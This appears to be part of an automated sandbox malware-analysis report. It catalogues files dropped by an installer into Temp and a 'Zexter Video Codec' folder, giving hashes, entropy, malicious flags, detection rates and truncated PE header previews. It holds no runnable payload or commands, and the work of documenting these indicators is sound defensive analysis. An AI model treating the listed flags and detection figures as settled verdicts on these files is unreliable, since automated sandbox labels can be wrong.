                                                                                                    SHA-256:EC52F73A17E6AFCF78F3FD8DFC7177024FEB52F5AC2B602886788E4348D5FB68
                                                                                                    SHA-512:130A074E6AD38EEE2FB088BED2FCB939BF316B0FCBB4F5455AB49C2685BEEDCB5011107A22A153E56BF5E54A45CA4801C56936E71899C99BA9A4F694A1D4CC6D
                                                                                                    Malicious:false
                                                                                                    Reputation:moderate, very likely benign file
                                                                                                    Preview:dad6f9fa0c8327344d1aa24f183c3767................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Temp\is-2SCAO.tmp\_isetup\_RegDLL.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4096
                                                                                                    Entropy (8bit):4.026670007889822
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:ivuz1hEU3FR/pmqBl8/QMCBaquEMx5BC+SS4k+bkguj0KHc:bz1eEFNcqBC/Qrex5iSKDkc
                                                                                                    MD5:0EE914C6F0BB93996C75941E1AD629C6
                                                                                                    SHA1:12E2CB05506EE3E82046C41510F39A258A5E5549
                                                                                                    SHA-256:4DC09BAC0613590F1FAC8771D18AF5BE25A1E1CB8FDBF4031AA364F3057E74A2
                                                                                                    SHA-512:A899519E78125C69DC40F7E371310516CF8FAA69E3B3FF747E0DDF461F34E50A9FF331AB53B4D07BB45465039E8EBA2EE4684B3EE56987977AE8C7721751F5F9
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Joe Sandbox View:
                                                                                                    • Filename: noode.exe, Detection: malicious, Browse
                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                    • Filename: noode.exe, Detection: malicious, Browse
                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                    • Filename: AX3-GUI-45.exe, Detection: malicious, Browse
                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                    • Filename: AX3-GUI-45.exe, Detection: malicious, Browse
                                                                                                    • Filename: qgdf1HLJno.exe, Detection: malicious, Browse
                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................H................|.......|.......|......Rich............PE..L....M;J..................................... ....@..........................@..............................................l ..P....0..@............................................................................ ..D............................text............................... ..`.rdata....... ......................@..@.rsrc...@....0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Temp\is-2SCAO.tmp\_isetup\_iscrypt.dll

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2560
                                                                                                    Entropy (8bit):2.8818118453929262
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                                                    MD5:A69559718AB506675E907FE49DEB71E9
                                                                                                    SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                                                    SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                                                    SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Temp\is-2SCAO.tmp\_isetup\_isdecmp.dll

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):13312
                                                                                                    Entropy (8bit):5.745960477552938
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:BXvhMwoSitz/bjx7yxnbdn+EHvbsHoOODCg:BZ7FEAbd+EDsIO
                                                                                                    MD5:A813D18268AFFD4763DDE940246DC7E5
                                                                                                    SHA1:C7366E1FD925C17CC6068001BD38EAEF5B42852F
                                                                                                    SHA-256:E19781AABE466DD8779CB9C8FA41BBB73375447066BB34E876CF388A6ED63C64
                                                                                                    SHA-512:B310ED4CD2E94381C00A6A370FCB7CC867EBE425D705B69CAAAAFFDAFBAB91F72D357966916053E72E68ECF712F2AF7585500C58BB53EC3E1D539179FCB45FB4
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........I...(...(...(..n ..(...(...(...$..(...$..(...$..(..Rich.(..................PE..L......B...........!..... ..........p........0....P..........................P.......................................;.......;..(............................@.......0...............................................0...............................text............ .................. ..`.rdata.......0.......$..............@..@.reloc.......@.......2..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Temp\is-2SCAO.tmp\_isetup\_setup64.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6144
                                                                                                    Entropy (8bit):4.215994423157539
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                                                                    MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                                                                    SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                                                                    SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                                                                    SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Temp\is-2SCAO.tmp\_isetup\_shfoldr.dll

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23312
                                                                                                    Entropy (8bit):4.596242908851566
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                                                    MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                                                    SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                                                    SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                                                    SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\L9rm7AX4mp.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):709120
                                                                                                    Entropy (8bit):6.498750714093575
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:thu7eEcdCP8trP837szHUA6JCzS9Ntc3l3ER6orNjURFFDExyF:Pu7eEYCP8trP837szHUA60SLtcV3E9kT
                                                                                                    MD5:16C9D19AB32C18671706CEFEE19B6949
                                                                                                    SHA1:FCA23338CB77068E1937DF4E59D9C963C5548CF8
                                                                                                    SHA-256:C1769524411682D5A204C8A40F983123C67EFEADB721160E42D7BBFE4531EB70
                                                                                                    SHA-512:32B4B0B2FB56A299046EC26FB41569491E8B0CD2F8BEC9D57EC0D1AD1A7860EEC72044DAB2D5044CB452ED46E9F21513EAB2171BAFA9087AF6D2DE296455C64B
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 4%
                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................x..........x.............@..............................................@...............................%..................................................................................................................CODE.....w.......x.................. ..`DATA.................|..............@...BSS.....l................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................^..............@..P........................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\is-2DT7G.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1606715
                                                                                                    Entropy (8bit):6.432733703292802
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:qi0l5PSkLHq6M30RmWXD4cE/TpXy4CEJQwAj7/RyYijPIDEFIgX3zdHyqFMa:eSqVMkRm3dyEYiGEFTdfFN
                                                                                                    MD5:34007E6F8E18D371DBFF19A279B008C3
                                                                                                    SHA1:58B091382EB981587CA6FDFAFC314E458598B8BB
                                                                                                    SHA-256:44D65416BB7EC0F43CE91927B33002CDF3E56038562F83E602C19A20C48AEB7D
                                                                                                    SHA-512:37F6338CDEA6220CF9079F25F760A2C7A50A01BD6A98C01798D20203F5A56FA0F37CDD7E91AE246C1077A34EC4FA42E9D2305ADA7CA8945E6591C8E26164C906
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...2..............#.............*................xm......................................... .........................9........z......`.......................<....................................................................................text...D...........................`.P`.data...............................@.`..rdata..4...........................@.`@/4......D...........................@.0@.bss.....)............................`..edata..9........ ...|..............@.0@.idata...z.......|..................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...`...........................@.0..reloc..<............ ..............@.0B........................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\is-2TIQ1.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):92019
                                                                                                    Entropy (8bit):5.974787373427489
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:+j80nVGEhJyBnvQXUDkUPoWCSgZosDGMsZLXWU9+HN4yoRtJJ:C8IgtyUDkBWIZosDGDBXWPHN4yoRtJJ
                                                                                                    MD5:CC7DAD980DD04E0387795741D809CBF7
                                                                                                    SHA1:A49178A17B1C72AD71558606647F5011E0AA444B
                                                                                                    SHA-256:0BAE9700E29E4E7C532996ADF6CD9ADE818F8287C455E16CF2998BB0D02C054B
                                                                                                    SHA-512:E4441D222D7859169269CA37E491C37DAA6B3CDD5F4A05A0A246F21FA886F5476092E64DFF88890396EF846B9E8D2880E33F1F594CD61F09023B3EF4CD573EA3
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...(....0..7......#.........,.....................m................................B......... ...................... .......0...*...........................................................p......................t5...............................text..............................`.P`.data... ...........................@.0..rdata..............................@.`@/4.......(.......*..................@.0@.bss..................................`..edata....... ......................@.0@.idata...*...0...,..................@.0..CRT....,....`....... ..............@.0..tls.... ....p......."..............@.0..rsrc................$..............@.0..reloc...............(..............@.0B........................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\is-4BT74.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):171848
                                                                                                    Entropy (8bit):6.579154579239999
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:LrhG5+L/AcY680k2SxVqetJP5Im+A9mNoWqlM5ywwoS:LV6+LA0G0enP5PFYOWi6w1
                                                                                                    MD5:236A679AB1B16E66625AFBA86A4669EB
                                                                                                    SHA1:73AE354886AB2609FFA83429E74D8D9F34BD45F2
                                                                                                    SHA-256:B1EC758B6EDD3E5B771938F1FEBAC23026E6DA2C888321032D404805E2B05500
                                                                                                    SHA-512:C19FA027E2616AC6B4C18E04959DFE081EF92F49A11260BA69AFE10313862E8FEFF207B9373A491649928B1257CF9B905F24F073D11D71DCD29B0F9ADAC80248
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... ......;......#...............................c................................q......... .........................,.......<.......H...........................................................................(................................text...............................`.P`.data... ...........................@.0..rdata..|y.......z..................@.`@/4......HN...@...P... ..............@.0@.bss..................................`..edata..,............p..............@.0@.idata..<............~..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...H...........................@.0..reloc..............................@.0B........................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\is-4GU98.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):463112
                                                                                                    Entropy (8bit):6.363613724826455
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:qyoSS9Gy176UixTUTfeKEVfA/K4FW0BGXOjY:pS93176nxTUTEA/Kuk
                                                                                                    MD5:D9D9C79E35945FCA3F9D9A49378226E7
                                                                                                    SHA1:4544A47D5B9765E5717273AAFF62724DF643F8F6
                                                                                                    SHA-256:18CBD64E56CE58CE7D1F67653752F711B30AD8C4A2DC4B0DE88273785C937246
                                                                                                    SHA-512:B0A9CEFAC7B4140CC07E880A336DCBAB8B6805E267F4F8D9423111B95E4D13544D8952D75AB51ADE9F6DACE93A5425E6D41F42C2AA88D3A3C233E340EE785EB9
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........V.........#.........R....................lf.......................................... ......................@..w.......................................<....................................................................................text...$...........................`.P`.data... ...........................@.0..rdata...J.......L..................@.`@/4..................................@.0@.bss....h....0........................`..edata..w....@......................@.0@.idata..............................@.0..CRT....,............4..............@.0..tls.... ............6..............@.0..reloc..<............8..............@.0B................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\is-4L8QF.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):121524
                                                                                                    Entropy (8bit):6.347995296737745
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:9v6EzEhAArrzEYz8V2clMs4v6C7382gYbByUDM6H0ZulNDnt8zXxgf:9T8AArrzDylMs5C738FYbpH0Ent8zBgf
                                                                                                    MD5:6CE25FB0302F133CC244889C360A6541
                                                                                                    SHA1:352892DD270135AF5A79322C3B08F46298B6E79C
                                                                                                    SHA-256:E06C828E14262EBBE147FC172332D0054502B295B0236D88AB0DB43326A589F3
                                                                                                    SHA-512:3605075A7C077718A02E278D686DAEF2E8D17B160A5FEDA8D2B6E22AABFFE0105CC72279ADD9784AC15139171C7D57DBA2E084A0BA22A6118FDBF75699E53F63
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....8r>....7......#.....^...................p.....n.........................0................ ........................._.................................... .......................................................................................text...X].......^..................`.P`.data... ....p.......b..............@.0..rdata........... ...d..............@.`@/4...............0..................@.0@.bss....(.............................`..edata.._...........................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc....... ......................@.0B................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\is-4PKG7.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):248694
                                                                                                    Entropy (8bit):6.346971642353424
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:MUijoruDtud8kVtHvBcEcEJAbNkhJIXM3rhv:Cy8kTHvBcE1kI3rhv
                                                                                                    MD5:39A15291B9A87AEE42FBC46EC1FE35D6
                                                                                                    SHA1:AADF88BBB156AD3CB1A2122A3D6DC017A7D577C1
                                                                                                    SHA-256:7D4546773CFCC26FEC8149F6A6603976834DC06024EEAC749E46B1A08C1D2CF4
                                                                                                    SHA-512:FF468FD93EFDB22A20590999BC9DD68B7307BD406EB3746C74A3A472033EA665E6E3F778325849DF9B0913FFC7E4700E2BEED4666DA6E713D984E92F9DB5F679
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........w......#.....x.........................i.......................................... ......................`..u........1...................................................................................................................text...Tw.......x..................`.P`.data................|..............@.`..rdata..t;.......<...~..............@.`@/4.......f.......h..................@.0@.bss.........P........................`..edata..u....`......."..............@.0@.idata...1.......2...>..............@.0..CRT....,............p..............@.0..tls.... ............r..............@.0..reloc...............t..............@.0B................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\is-4SCDL.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):98626
                                                                                                    Entropy (8bit):6.478068795827396
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:HDuZqv5WNPuWOD+QZ7OWN4oOlatKZ2XGnToIfQIOEIOGxpdo4VoWsj:r9P6WN4wyTBfGqGxpdo4VoB
                                                                                                    MD5:70CA53E8B46464CCF956D157501D367A
                                                                                                    SHA1:AE0356FAE59D9C2042270E157EA0D311A831C86A
                                                                                                    SHA-256:4A7AD2198BAACC14EA2FFD803F560F20AAD59C3688A1F8AF2C8375A0D6CC9CFE
                                                                                                    SHA-512:CB1D52778FE95D7593D1FDBE8A1125CD19134973B65E45F1E7D21A6149A058BA2236F4BA90C1CE01B1B0AFAD4084468D1F399E98C1F0D6F234CBA023FCC7B4AE
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....='=.x..=......#.........t.....................c.......................................... .................................8...............................0...................................................0................................text...t...........................`.P`.data... ...........................@.0..rdata...M.......N..................@.`@/4......t&...P...(...4..............@.0@.bss..................................`..edata...............\..............@.0@.idata..8............f..............@.0..CRT....,............n..............@.0..tls.... ............p..............@.0..reloc..0............r..............@.0B................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\is-61SBR.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65181
                                                                                                    Entropy (8bit):6.085572761520829
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:1JrcDWlFkbBRAFqDnlLKgprfElH0hiGoeLXRcW/VB6dkhxLemE5ZHvIim3YWATMk:XrTk3iqzlLKgp6H38B6u0Uim3Y15P
                                                                                                    MD5:98A49CC8AE2D608C6E377E95833C569B
                                                                                                    SHA1:BA001D8595AC846D9736A8A7D9161828615C135A
                                                                                                    SHA-256:213B6ADDAB856FEB85DF1A22A75CDB9C010B2E3656322E1319D0DEF3E406531C
                                                                                                    SHA-512:C9D756BB127CAC0A43D58F83D01BFE1AF415864F70C373A933110028E8AB0E83612739F2336B28DC44FAABA6371621770B5BCC108DE7424E31378E2543C40EFC
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........[......#...............................d.........................p................ .............................. .......P..P....................`..x............................@.......................!..\............................text...D...........................`.P`.data...D...........................@.0..rdata..l...........................@.0@/4......p/.......0..................@.0@.bss..................................`..edata..............................@.0@.idata....... ......................@.0..CRT....0....0......................@.0..tls.... ....@......................@.0..rsrc...P....P......................@.0..reloc..x....`......................@.0B........................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\is-65SGC.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):235032
                                                                                                    Entropy (8bit):6.398850087061798
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:fWa7MVS9CtXk4wP0filbZ5546Qx/cwx/svQbKDazN1x:3MVTtXlwP0f0rK6QxEYz
                                                                                                    MD5:E1D0ACD1243F9E59491DC115F4E379A4
                                                                                                    SHA1:5E9010CFA8D75DEFBDC3FB760EB4229ACF66633B
                                                                                                    SHA-256:FD574DA66B7CCAE6F4DF31D5E2A2C7F9C5DAE6AE9A8E5E7D2CA2056AB29A8C4F
                                                                                                    SHA-512:392AA2CF6FBC6DAA6A374FD1F34E114C21234061855413D375383A97951EC5DDDF91FD1C431950045105746898E77C5C5B4D217DF0031521C69403EA6ADE5C27
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........Y......#..............................tp.......................................... .........................$...............................................................................................<............................text...............................`.P`.data...L...........................@.0..rdata...1.......2..................@.`@/4.......m... ...n..................@.0@.bss..................................`..edata..$............`..............@.0@.idata...............j..............@.0..CRT....,............t..............@.0..tls.... ............v..............@.0..reloc...............x..............@.0B................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\is-6DO3I.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):337171
                                                                                                    Entropy (8bit):6.46334441651647
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:TQkk4LTVKDKajZjp8aEEHeEkls4q5dRIFSqObK/q+P82JSccgSGDGxQXKHlTmn93:3kwpKlf1QNSqOb6q+PRJb6GDGmKH893
                                                                                                    MD5:51D62C9C7D56F2EF2F0F628B8FC249AD
                                                                                                    SHA1:33602785DE6D273F0CE7CA65FE8375E91EF1C0BC
                                                                                                    SHA-256:FC3C82FAB6C91084C6B79C9A92C08DD6FA0659473756962EFD6D8F8418B0DD50
                                                                                                    SHA-512:03FB13AE5D73B4BABA540E3358335296FB28AA14318C27554B19BB1E90FAD05EA2DD66B3DB216EA7EED2A733FE745E66DB2E638F5ED3B0206F5BE377F931DF5B
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...2..............#......................... .....c.........................`................ ..........................8........... .......................0.../......................................................`............................text...............................`.P`.data...`.... ......................@.0..rdata..4....0......................@.`@/4......D...........................@.0@.bss..................................`..edata...8.......:...p..............@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc........ ......................@.0..reloc.../...0...0..................@.0B........................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\is-6S03E.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):26562
                                                                                                    Entropy (8bit):5.606958768500933
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:EaiL7abI5n6MnFUKs7qfSWWmJZLfw2tnPrPkV:4XabI5n5niKsOwmnU
                                                                                                    MD5:E9C7068B3A10C09A283259AA1B5D86F2
                                                                                                    SHA1:3FFE48B88F707AA0C947382FBF82BEE6EF7ABB78
                                                                                                    SHA-256:06294F19CA2F7460C546D4D0D7B290B238C4959223B63137BB6A1E2255EDA74F
                                                                                                    SHA-512:AC4F521E0F32DBF104EF98441EA3403F0B7D1B9D364BA8A0C78DAA056570649A2B45D3B41F0B16A1A73A09BAF2870D23BD843E6F7E9149B697F7E6B7222E0B81
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7G7.Z..V......#.....(...V...............@.....m.......................................... .........................O...............p.......................l.......................................................@............................text....&.......(..................`.P`.data...0....@.......,..............@.0..rdata.......P......................@.0@/4...........`.......6..............@.0@.bss.........p........................`..edata..O............B..............@.0@.idata...............D..............@.0..CRT....,............N..............@.0..tls.... ............P..............@.0..rsrc...p............R..............@.0..reloc..l............V..............@.0B........................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\is-7G2MG.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):174543
                                                                                                    Entropy (8bit):6.3532700320638025
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:F4yjzZ0q/RZ1vAjhByeVjxSTi7p2trtfKomZr8jPnJe0rkUlRGptdKH69T5GNg9v:FjjE0PCn3baPXuD7
                                                                                                    MD5:65D8CB2733295758E5328E5A3E1AFF15
                                                                                                    SHA1:F2378928BB9CCFBA566EC574E501F6A82A833143
                                                                                                    SHA-256:E9652AB77A0956C5195970AF39778CFC645FC5AF22B95EED6D197DC998268642
                                                                                                    SHA-512:BF6AA62EA82DFDBE4BC42E4D83469D3A98BFFE89DBAB492F8C60552FCB70BBA62B8BF7D4BDAB4045D9BC1383A423CAA711E818F2D8816A80B056BC65A52BC171
